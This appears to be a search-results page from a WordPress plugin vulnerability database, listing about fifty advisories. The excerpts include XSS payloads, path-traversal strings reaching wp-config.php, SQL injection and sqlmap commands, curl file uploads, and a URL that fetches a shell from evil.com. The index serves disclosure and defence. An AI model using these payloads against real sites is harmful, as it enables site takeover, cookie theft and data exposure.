4359 matches found
Form Lightbox - Arbitrary Option Update Leading to Admin Account
This is a plugin that is no longer in the WordPress repository, however, is still in use on some sites. With this vulnerability an attacker can update any option in the WordPress database. This includes gaining an admin access. Using the file ajax.php that contains the following line: updateoptio...
Dwnldr 1.0 - Unauthenticated Stored Cross-Site Scripting (XSS)
User agent strings are logged when requesting downloads that are processed by dwnldr and displayed back to the admin with no encoding, allowing for scripts to be stored and executed. curl -A "User-Agent: alertdocument.cookie;" -O http:///?attachmentid=...
Real3D FlipBook <= 2.8 - Multiple Vulnerabilities
List of vulnerabilities: - Delete any file or directory from the server Unauthenticated - Upload images in Root directory Unauthenticated - Cross-Site Scripting XSS + POCExploit CodeCanyon Real3D FlipBook WordPress Plugin + http://codecanyon.net/item/real3d-flipbook-wordpress-plugin/6942587 +...
Cherry Plugin < 1.2.7 - Unauthenticated Arbitrary File Upload and Download
The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file. Upload: The following file...
Contus Video Comments - Unauthenticated Remote JPG File Upload
The contus-video-comments WordPress plugin was affected by an Unauthenticated Remote JPG File Upload security vulnerability. curl --data @image.jpg "http://www.example.com/wp-content/plugins/contus-video-comments/save.php?id=../image"...
CM Ad Changer <= 1.7.7 - Stored Cross-Site Scripting (XSS)
An Stored Cross Site Scripting was reported by the author to CM Ad Plugins under which an unprivileged user can trigger a Stored XSS to perform malicious actions or any attacker could send a crafted link CSRF which can trigger the Stored XSS. 1 Go to CM Ad changers - Campaigns 2 Create a Campaign...
WP Mobile Detector <= 3.5 - Arbitrary File Upload
The wp-mobile-detector WordPress plugin was affected by an Arbitrary File Upload security vulnerability. As seen in access logs: http://www.example.com/wp-content/plugins/wp-mobile-detector/resize.php?src=https://www.evil.com/shell.php...
Stream <= 3.0.5 - Unauthenticated Events Export
The Stream WordPress plugin allows unauthenticated users to export CSV or JSON of recent events. The code only checks to see if the proper GET variables are passed to a valid backend WordPress handler and will happily export logged entries. Reported to maintainers on 5/25/2016 and new version...
brafton WordPress Plugin <=3.4.7 - Reflected XSS
Title -brafton WordPress Plugin XSS Exploit Title : Vulnerabilitie XSS in brafton WordPress Plugin Date: Fri May 20 2016 Reported Date : Fri May 20 2016 Vendor Homepage: http://www.brafton.com/support/wordpress/ Version: v3.3.10 – January2016 Software Link:...
Tera Charts 1.0 - Unauthenticated Cross-Site Scripting (XSS)
The tera-charts WordPress plugin was affected by an Unauthenticated Cross-Site Scripting XSS security vulnerability. http://www.example.com/tera-charts/charts/treemap.php?fn=";alert1;"&userid=1...
safe-editor <= 1.1 - Unauthenticated CSS/JS-injection
When saving JS/CSS in this plugin then both private and public ajax-hooks are being used. Because of this anyone can post JS/CSS that are saved to the db and printed to the head and footer portion of the page. In the file "index.php" in root folder on line 188 and 189 you can see that both privat...
Truemag Theme - Unauthenticated Reflected Cross-Site Scripting (XSS)
The truemag WordPress theme was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://WP/?s="%20alertdocument.cookie...
The Events Calendar <= 4.1.1 - Open Redirect
The problem is located in the "tribe-bar-view" parameter that can be used to redirect a user to an arbitrary website. Timeline 2016-04-04 : Initial contact with Modern Tribe 2016-04-05 : Modern Tribe confirms the report 2016-04-07 : Modern Tribe publishes a new version 4.1.1.1 that resolves the...
e-search <= 1.0 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The e-search WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/e-search/tmpl/dateselect.php?date-from="alert1;alert1;"...
WHIZZ <= 1.0.7 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The WHIZZ WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin="alert1;"...
Admin Font Editor <= 1.8 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The admin-font-editor WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/admin-font-editor/css.php?size="alert1;"...
Tidio Gallery <= 1.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The tidio-gallery WordPress plugin was affected by a Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId="alert1;"...
anti-plagiarism <= 3.60 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The anti-plagiarism WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/anti-plagiarism/js.php?m="alert1;"...
MiniMax <= 2.0.2 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The page-layout-builder WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layoutsettingsid="alert1;"...
defa-online-image-protector <= 3.3 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The defa-online-image-protector WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/defa-online-image-protector/redirect.php?r="alert1;"...
S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The s3-video WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/s3-video/views/video-management/previewvideo.php?media="alert1;"...
Easy Contact Form Builder <= 1.0 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The tidio-form WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/tidio-form/popup-insert-help.php?formId="alert1;"...
Hero Maps Pro <= 2.1.0 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The hero-maps-pro WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v="alert1;"...
AJAX Random Post <= 2.00 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The ajax-random-post WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/ajax-random-post/js.php?interval="alert1;"...
HDW WordPress Video Gallery <= 1.2 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The hdw-tube WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/hdw-tube/playlist.php?playlist="alert1;alert1;"...
Infusionsoft Gravity Forms Add-on <= 1.5.11 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The Infusionsoft Gravity Forms Add-on WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId="alert1;"...
WPSOLR <= 8.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The WPSOLR - Elasticsearch and Solr search WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability...
MW Font Changer <= 4.2.5 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The MW Font Changer WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/parsi-font/css.php?size="alert1;"...
New Year Firework <= 1.1.9 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The new-year-firework WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/new-year-firework/firework/index.php?text="alert1;"...
Indexisto WordPress Site Search <= 1.0.5 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The indexisto WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexistoindex="alert1;"...
WP Multiple Meta Box 1.0 - Authenticated Blind SQL Injection
The multi-meta-box WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability. http://www.example.com/wp-admin/admin.php?page=multimetaboxlisting&action=edit&id=1 AND SELECT FROM SELECTSLEEP5Etmx...
Stop User Enumeration <= 1.3.3 - Username Enumeration Bypass
Using the plugin "Stop User Enumeration 1.3.3" is possible bypass it to get the usernames. Blocked: http://www.example.com/?author%00=%001 Passed: http://www.example.com/?bypass=1&author%00=1...
Cerber Limit Login Attempts <= 2.0.1.6 - Unauthenticated Stored XSS
If the option "I'm behind a proxy" is enabled, the visitor IP is read from X-Forwarded-For header, stored & printed in the admin panel without any sanitization / validation. Set the X-Forwarded-For header to alert1, and perform an incorrect login...
Anti-Malware Security & Brute-Force Firewall <= 4.15.42 - XSS & CSRF
The Anti-Malware Security and Brute-Force Firewall WordPress plugin was affected by a XSS & CSRF security vulnerability. XSS vulnerability in https://wordpress.org/plugins/gotmls/ has been identified. While I scan a site with that plugin , i had a file '".png and it was skippped , but result was...
Memphis Document Library Plugin <= 3.1.5 - Arbitrary File Download
The function "mdocsimgpreview" is in charge of downloading image previews previously uploaded by the administrator, but it does not sanitize the file path being downloaded, thus, allowing to download arbitrary files in the file system. The vulnerable GET parameter is "mdocs-img-preview". The...
ABtest - File Inclusion
The abtest WordPress plugin was affected by a File Inclusion security vulnerability. http://www.example.com/wp-content/plugins/abtest/abtestadmin.php?action=../../../../../../../../../../../../../../../proc/self/environ%00...
Nextend Facebook Connect <= 1.5.7 - Cross-Site Request Forgery (CSRF)
The Nextend Social Login and Register WordPress plugin was affected by a Cross-Site Request Forgery CSRF security vulnerability...
Ocim MP3 Plugin - Unauthenticated Reflected Cross-Site Scripting (XSS)
Credits to : Soufiane Boussali http://www.example.com/wp-content/plugins/ocim-mp3/source/pages.php?id=XSSPayload...
InstaLinker <= 1.1.1 - Reflected Cross-Site Scripting (XSS)
Due to a lack of input sanitization in the includes/instalinker-admin-preview.php file, it is possible to utilise a reflected XSS vector to run a script in the target user's browser and potentially compromise the WordPress installation...
Sola Support Ticket <= 3.12 - XSS & Configuration Change
Any logged in user with any role and access to wp-admin in any way can update plugin settings including allowing HTML to be parsed. One can also change any notification messages to include JS which then can be used to obtain information by forgery. Make POST request to /wp-admin with parameters...
IMPress Listings <= 2.0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The IMPress Listings WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. IMPress Listings XSS Demo alertdocument.cookie;...
Commentator <= 2.5.2 - Reflected Cross-Site Scripting (XSS)
The commentator WordPress plugin was affected by a Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-admin/admin-ajax.php?action=commentatorsocialsignin&provider=facebook"...
WordPress 3.7-4.4 - Authenticated Cross-Site Scripting (XSS)
http://www.example.com/wp-admin/customize.php?theme= source: https://twitter.com/brutelogic/status/685105483397619713...
YAWPP <= 1.2.2 - Unauthenticated Stored Cross-Site Scripting (XSS)
The yawpp WordPress plugin was affected by an Unauthenticated Stored Cross-Site Scripting XSS security vulnerability. POST /wordpress-4.3/?p=4 HTTP/1.1 Host: wp.lab User-Agent: Mozilla/5.0 Macintosh; Intel Mac OS X 10.10; rv:42.0 Gecko/20100101 Firefox/42.0 Accept:...
Advanced uploader - Local File Inclusion
The Advanced uploader WordPress plugin was affected by a Local File Inclusion security vulnerability. http://www.example.com/wp-content/plugins/advanced-uploader/upload.php?destinations=../../../../../../../../../wp-config.php%00...
Auto ThickBox Plus <= 1.9 - Reflected Cross-Site Scripting (XSS)
The auto-thickbox-plus WordPress plugin was affected by a Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/auto-thickbox-plus/download.min.php?file=%3Cscript%3Ealert%281%29%3C/script%3E...
WP Fastest Cache <= 0.8.4.8 - Blind SQL Injection
According to the researcher, for this vulnerability to be present WP-Polls plugin also needs to be installed...
WordPress File Upload <= 3.4.0 - Unauthenticated Malicious File Upload
The WordPress plugin wp-file-upload does not adequately check the filetype before allowing it to be uploaded. It also uploaded files with execute permissions, allowing malicious payloads to be uploaded. 1. Install wp-file-upload on a WordPress site and activate it. 2. Create an upload form on a...
wp-championship <= 5.8 - Authenticated Blind SQL Injection
The wp-championship WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability. $ sqlmap -u 'http://www.example.com/wp-admin/wp-championship/csadminusers.php&userid=' --data="isadmin=1&user" --cookie=AUTHCOOKIEHERE --level=5 --risk=3...
Recent Posts Widget Extended <= 0.9.9.3 - Authenticated XSS (multisite)
XSS in the Recent Posts Widget Extended plugin allows single site admins to change network admin's password with simple CSRF described above POC field. This vulnerability is currently unpatched. 1. Login as single site administrator 2. Add Recent Posts Extended Widget to some widget area 3. Add...